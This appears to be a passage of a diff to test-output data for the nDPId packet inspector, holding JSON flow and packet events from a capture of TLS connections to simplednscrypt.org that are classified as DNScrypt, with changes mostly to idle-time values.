{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813284555,"flow_last_seen":1491813284555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813284555,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491813284555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284555,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PRVAAIAGMNDAqCunhncaGMQ5Abvf\/XrjAAAAAIACIAChWwAAAgQFtAEDAwgBAQQC"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491813284666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284666,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xDnBW87r3\/165IASchC\/iQAAAgQFHgEBBAIBAwMH"} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491813284666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813284666,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPRZAAIAGMNvAqCunhncaGMQ5Abvf\/XrkwVvO7FAQAEBxlgAA"} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286275,"flow_last_seen":1491813286275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286275,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491813286275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286275,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSdAAIAGML7AqCunhncaGMRNAbtYb9jbAAAAAIACIADK3QAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286392,"flow_last_seen":1491813286392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286392,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1491813286392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286392,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PShAAIAGML3AqCunhncaGMRSAbte7A6DAAAAAIACIACOtAAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286393,"flow_last_seen":1491813286393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286393,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1491813286393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286393,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSlAAIAGMLzAqCunhncaGMRTAbtepcAHAAAAAIACIADddQAAAgQFtAEDAwgBAQQC"} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491813286463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286463,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xE3jDV\/XWG\/Y3IASchA2bgAAAgQFHgEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491813286463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286463,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSpAAIAGMMfAqCunhncaGMRNAbtYb9jc4w1f2FAQAEDoegAA"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1491813286470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286470,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADUGuOWGdxoYwKgrpwG7xFOF+CiKXqXACIASchDdaAAAAgQFHgEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1491813286470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286470,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSxAAIAGMMXAqCunhncaGMRTAbtepcAIhfgoi1AQAECPdQAA"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1491813286489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286489,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xFKVdKj9XuwOhIASchD+twAAAgQFHgEBBAIBAwMH"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1491813286489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286489,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPS5AAIAGMMPAqCunhncaGMRSAbte7A6ElXSo\/lAQAECwxAAA"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain 
Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 
+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 